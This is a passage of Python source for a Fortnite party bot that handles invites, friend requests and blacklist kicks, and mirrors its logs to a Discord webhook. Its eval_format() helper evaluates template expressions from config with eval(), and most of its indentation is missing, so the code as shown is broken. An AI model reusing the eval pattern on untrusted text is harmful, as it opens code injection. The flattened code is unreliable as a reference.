await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
                await asyncio.gather(*[_(pending) for pending in self.incoming_pending_friends])
            except Exception:
                send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if flag:
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
                user = self.get_user(data['fortnite'][mimic]) or self.get_cache_user(data['fortnite'][mimic])
if not user:
try:
user = await self.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
setattr(self,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(self,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled']:
try:
await dclient.start(data['discord']['token'])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_before_close(self) -> None:
self.isready = False
self.boot_time = None
send(name(self.user),f'{l("closing")}: {self.user.display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_restart(self) -> None:
self.boot_time = time.time()
send(name(self.user),l("relogin", self.user.display_name),green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_invite(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if not self.isready or not invitation:
return
display_name = name(self.user)
self.add_cache(invitation.sender)
if invitation.sender.id in blacklist and data['fortnite']['blacklist-declineinvite']:
return
if invitation.sender.id in [owner.id for owner in self.owner]:
await self.invitation_accept(invitation)
return
if invitation.sender.id in whitelist and data['fortnite']['whitelist-allowinvite']:
await self.invitation_accept(invitation)
return
if data['loglevel'] == 'normal':
send(display_name,l("invite_from",name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("invite_from2",f'{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]',invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
for owner in self.owner:
if self.party.get_member(owner.id) and data['fortnite']['invite-ownerdecline']:
await self.invitation_decline_owner(invitation)
return
if True in [member.id in whitelist for member in self.party.members] and data['fortnite']['whitelist-declineinvite']:
await self.invitation_decline_whitelist(invitation)
elif not self.acceptinvite:
await self.invitation_decline(invitation)
elif not self.acceptinvite_interval:
await self.invitation_decline_interval(invitation)
else:
await self.invitation_accept(invitation)
async def event_friend_request(self, request: Union[fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend]) -> None:
if not self.isready or not request:
return
display_name = name(self.user)
self.add_cache(request)
if request.outgoing:
send(display_name,l("friend_request_to",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
return
send(display_name,l("friend_request_from",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.acceptfriend is True:
try:
await request.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await request.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("friend_request_decline",name(request)),red,add_d=lambda x:f'>>> {x}')
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if friend.outgoing:
send(display_name,l("friend_accept",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_add",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if data['loglevel'] == 'normal':
send(display_name,l("friend_remove",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_remove",f'{name(friend)} [{platform_to_str(friend.platform)}]'),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members.append({"memberId": member.id, "absoluteMemberIdx": member.position})
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
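            # Shortly after a join, re-patch the filtered visual member list so
            # hidden users stay hidden, then restore the real assignments in the
            # local meta; the sleeps let the join and the patch settle.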
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
if data['fortnite']['hide-user']:
                        if (not (member.id in [owner.id for owner in self.owner] and data['fortnite']['show-owner'])
                                and not (member.id in whitelist and data['fortnite']['show-whitelist'])
                                and not (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['show-bot'])
                                and member.id != self.user.id):
                            self.visual_members = [squad for squad in self.visual_members if squad["memberId"] != member.id]
elif data['fortnite']['hide-blacklist']:
if member.id in blacklist:
                            self.visual_members = [squad for squad in self.visual_members if squad["memberId"] != member.id]
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l('party_member_joined',name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l('party_member_joined',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend']:
for member_ in member.party.members:
try:
if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.joinmessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
mes = eval_format(data['fortnite']['joinmessage'],var)
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.randommessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
randommessage = random.choice(data['fortnite']['randommessage'])
                mes = eval_format(randommessage,var)
send(display_name,f'{l("random_message")}: {mes}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(0.1)
if data["fortnite"]["joinemote"]:
try:
await self.change_asset(self.user.id, "Emote", self.eid)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.party.leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_leave(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
                self.visual_members = [squad for squad in self.visual_members if squad["memberId"] != member.id]
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_left",name(member),member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_left",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
if data['fortnite']['addfriend']:
            for member_ in member.party.members:
                if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
                    try:
                        await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
continue
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_confirm(self, confirmation: fortnitepy.PartyJoinConfirmation) -> None:
if not self.isready or not confirmation:
return
self.add_cache(confirmation.user)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_request",name(confirmation.user)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if data['fortnite']['blacklist-autokick'] and confirmation.user.id in blacklist:
try:
await confirmation.reject()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_partyrequest"),red,add_d=lambda x:f'>>> {x}')
else:
try:
await confirmation.confirm()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_partyrequest"),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_kick(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
                self.visual_members = [squad for squad in self.visual_members if squad["memberId"] != member.id]
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
        loop = asyncio.get_event_loop()  # needed for the create_task call below
        if self.party.me.leader and member.id != self.user.id and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_kick",name(member.party.leader),name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_kick",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_member_promote(self, old_leader: fortnitepy.PartyMember, new_leader: fortnitepy.PartyMember) -> None:
if not self.isready or not old_leader or not new_leader:
return
self.add_cache(old_leader)
self.add_cache(new_leader)
display_name = name(self.user)
display_name_ = self.is_most()
try:
if new_leader.id == self.user.id:
if data['fortnite']['hide-user']:
await self.hide()
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_promote",name(old_leader),name(new_leader)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_promote",f'{name(old_leader)} [{platform_to_str(old_leader.platform)}/{old_leader.input}]',f'{name(new_leader)} [{platform_to_str(new_leader.platform)}/{new_leader.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if new_leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
                await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
for member in self.party.members:
if member.id in blacklist:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_playlist_change(self, party: fortnitepy.ClientParty, before: tuple, after: tuple) -> None:
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,after[0])
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_update", f"{name(member)} [{platform_to_str(member.platform)}/{member.input}]"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id == self.user.id:
return
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_outfit_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_outfit_change(member)
async def event_party_member_backpack_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pet_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
        await self.party_member_backpack_change(member)  # pets share the backpack slot, so reuse its handler
async def event_party_member_pickaxe_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_pickaxe_change(member)
async def event_party_member_emote_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_emoji_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_zombie(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_disconnect",name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_disconnect",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if self.party.me.leader:
try:
await member.kick()
except Exception:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_chatban(self, member: fortnitepy.PartyMember, reason: Optional[str]) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",name(member.party.leader),name(member),reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_update(self, party: fortnitepy.Party) -> None:
if not self.isready or not party:
return
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_update"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
await process_command(message)
async def event_party_message(self, message: fortnitepy.PartyMessage) -> None:
await process_command(message)
if True: #Functions
def now() -> str:
return datetime.datetime.now().strftime("%H:%M:%S")
def l(key: str, *args: Any, **kwargs: Any) -> Optional[str]:
text = localize.get(key)
if text:
return text.format(*args, **kwargs)
else:
return None
def name(user: Union[fortnitepy.user.UserBase, discord.user.User, WebUser]) -> str:
if data['loglevel'] == 'normal':
return user.display_name
else:
return f"{user.display_name} / {user.id}"
    def render_template(file_: str, **kwargs: Any) -> sanic.response.HTTPResponse:
template = env.get_template(file_)
return sanic.response.html(template.render(**kwargs))
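    # Background loop that flushes stored logs to the Discord webhook. Discord
    # rejects messages over 2000 characters, so chunks are capped at text_max
    # (1990); oversized content is truncated when 'omit-over2000' is set,
    # otherwise split and sent in pieces. A 204 response means success and the
    # entry is dropped; a 429 (rate limited) aborts this pass until the next
    # 5-second cycle. The trailing `else: continue` / `break` is the for-else
    # idiom: the outer loop breaks only when the chunk loop hit a 429.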
def dprint() -> None:
text_max = 1990
while True:
if data['discord-log']:
if data['skip-if-overflow'] and len(storedlogs) >= 50:
storedlogs.clear()
for num,log in enumerate(storedlogs):
try:
username = list(log.keys())[0]
content = list(log.values())[0]
if len(content) > text_max:
if data["omit-over2000"]:
text = content[:text_max] + "..."
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text
}
)
else:
text = [content[i:i+text_max] for i in range(0, len(content), text_max)]
for text_ in text:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text_
}
)
if res.status_code == 429:
break
else:
continue
break
else:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': content
}
)
if res.status_code == 204:
storedlogs.pop(num)
if res.status_code == 429:
break
except TypeError:
                        if data['loglevel'] == 'debug':
print(red(traceback.format_exc()))
try:
storedlogs.pop(num)
except Exception:
pass
continue
except Exception:
print(red(traceback.format_exc()))
print(red(f"{username}: {content} の送信中にエラーが発生しました"))
continue
time.sleep(5)
def dstore(username: str, content: Any) -> None:
if data['discord-log']:
if data['hide-email']:
for email in data['fortnite']['email']:
content = content.replace(email,len(email)*"X")
if data['hide-token']:
for token in data['discord']['token'].split(','):
content = content.replace(token,len(token)*"X")
if data['hide-webhook']:
for webhook in data['webhook'].split(','):
content = content.replace(webhook,len(webhook)*"X")
if len(storedlogs) > 0:
if list(storedlogs[len(storedlogs)-1].keys())[0] == username:
storedlogs[len(storedlogs)-1][username] += f'\n{content}'
else:
storedlogs.append({username: content})
else:
storedlogs.append({username: content})
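    # Central logging helper: prints to the console (optionally colored, with a
    # prefix built by add_p) unless 'no-logs' is set, red error output always
    # showing, and mirrors the markdown-escaped message into the Discord log
    # buffer via dstore() (optionally reshaped by add_d).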
def send(user_name: str, content: Any, color: Optional[Callable] = None, add_p: Optional[Callable] = None, add_d: Optional[Callable] = None) -> Optional[str]:
content = str(content)
if not data['no-logs'] or color is red:
if not color:
if not add_p:
print(content)
else:
print(add_p(content))
else:
if not add_p:
print(color(content))
else:
print(color(add_p(content)))
content = discord.utils.escape_markdown(content)
if not add_d:
dstore(user_name,content)
else:
dstore(user_name,add_d(content))
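    # Whitespace tokenizer: splits text on whitespace, appending an empty string
    # as a separator marker; a whitespace character equal to `ignore` does not
    # split and is dropped, merging the words around it.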
def split_ignore(text: str, ignore: Optional[str] = None) -> list:
temp = ""
text_list = []
for char in text:
if char.split() != []:
temp += char
elif char != ignore:
if temp != "":
text_list.append(temp)
temp = ""
text_list.append("")
if temp != "":
text_list.append(temp)
return text_list
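    # Expands every {expression} placeholder by eval()'ing it against globals()
    # plus the supplied variables, e.g.
    #     eval_format("Hello {member_display_name}", var)
    # Note the template string can run arbitrary Python, so templates from
    # config.json are as trusted as the config itself.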
def eval_format(text: str, variables: dict = {}) -> str:
for match in format_pattern.finditer(text):
match_text = match.group()
eval_text = match_text.replace("{","",1)[::-1].replace("}","",1)[::-1]
result = eval(eval_text,globals(),variables)
text = text.replace(match_text,str(result),1)
return text
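    # Collects per-client stats for a ready client matching id_. Uses for-else:
    # the else branch runs only when no client matched, returning the empty
    # defaultdict so template lookups fall back to None.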
def get_client_data(id_: str) -> defaultdict:
var = defaultdict(lambda: None)
for client in clients:
if not client.isready:
continue
if client.user.id == id_:
break
else:
return var
party = getattr(client,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(client.friends),
"pending_count": len(client.pending_friends),
"incoming_pending_count": len(client.incoming_pending_friends),
"outgoing_pending_count": len(client.outgoing_pending_friends),
"block_count": len(client.blocked_users),
"display_name": client.user.display_name,
"id": client.user.id,
"boot_time": int(time.time() - dclient.boot_time)
}
)
return var
    def get_guild_member_count(id_: Union[str, int]) -> Optional[int]:
if isinstance(id_,str):
id_ = int(id_)
guild = dclient.get_guild(id_)
if guild is None:
return None
return guild.member_count
def platform_to_str(platform: fortnitepy.Platform) -> Optional[str]:
converter = {
fortnitepy.Platform.WINDOWS: "Windows",
fortnitepy.Platform.MAC: "Mac",
fortnitepy.Platform.PLAYSTATION: "PlayStation",
fortnitepy.Platform.XBOX: "Xbox",
fortnitepy.Platform.SWITCH: "Switch",
            fortnitepy.Platform.IOS: "iOS",
fortnitepy.Platform.ANDROID: "Android"
}
return converter.get(platform)
def convert_to_type(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "Outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "Back Bling"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "Pet"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "Harvesting Tool"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "Emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "Emoticon"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "Toy"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "Item"
def convert_to_asset(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emote"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "emote"
def convert_to_id(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "cid"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "bid"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "petcarrier"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe_id"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "eid"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emoji_id"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "toy_id"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "id"
def convert_to_old_type(text: str) -> Optional[str]:
converter = {
"outfit": "outfit",
"back bling": "backpack",
"pet": "pet",
"harvesting tool": "pickaxe",
"emote": "emote",
"emoticon":" emoji",
"toy": "toy",
"item": "item"
}
return converter.get(text.lower())
def convert_to_new_type(text: str) -> Optional[str]:
converter = {
"outfit": "Outfit",
"backpack": "Back Bling",
"pet": "Pet",
"pickaxe": "Harvesting Tool",
"emote": "Emote",
"emoji": "Emoticon",
"toy": "Toy",
"item": "Item"
}
return converter.get(text.lower())
    def convert_backend_type(backendType: str) -> Optional[str]:
converter = {
"AthenaBackpack": "Back Bling",
"AthenaPickaxe": "Harvesting Tool",
"AthenaItemWrap": "Wrap",
"AthenaGlider": "Glider",
"AthenaCharacter": "Outfit",
